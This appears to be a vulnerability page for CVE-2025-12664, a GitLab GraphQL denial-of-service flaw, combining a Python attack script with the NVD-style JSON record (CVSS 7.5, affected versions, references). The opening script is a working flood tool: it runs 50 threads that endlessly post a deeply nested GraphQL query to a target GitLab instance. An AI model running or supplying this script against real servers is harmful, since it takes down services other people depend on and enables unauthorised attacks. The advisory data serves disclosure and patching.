CVE-2025-12664

import requests import threading # Target GitLab URL target_url = "https://<gitlab-instance>/api/graphql" # Malicious GraphQL query designed to consume resources graphql_payload = { "query": """ { projects { nodes { id name repository { blobs { nodes { id } } } } } } """ } def send_attack(): try: while True: response = requests.post(target_url, json=graphql_payload, timeout=5) print(f"Sent request, status: {response.status_code}") except Exception as e: print(f"Error: {e}") # Launch multiple threads to simulate attack for i in range(50): t = threading.Thread(target=send_attack) t.start()

{"cve": {"id": "CVE-2025-12664", "sourceIdentifier": "[email protected]", "published": "2026-04-08T23:16:56.200", "lastModified": "2026-04-14T17:04:59.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "13.0.0", "versionEndExcluding": "18.8.9", "matchCriteriaId": "48E564F7-CB57-4A79-A921-BA28CF67C623"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "5C4D8A99-6E70-4D55-9ACF-FF2620F070E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "DBCB346F-0B28-458B-A453-29DA4B0E91FC"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "13.0.0", "versionEndExcluding": "18.8.9", "matchCriteriaId": "69D195DE-D52F-4794-84F8-B88A736360A0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "3BA6A89D-D2C1-45B9-A8E8-64256816D880"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "BB2F3665-2451-4A4D-8538-93F540975F0E"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/579376", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3377091", "source": "[email protected]", "tags": ["Permissions Required"]}]}}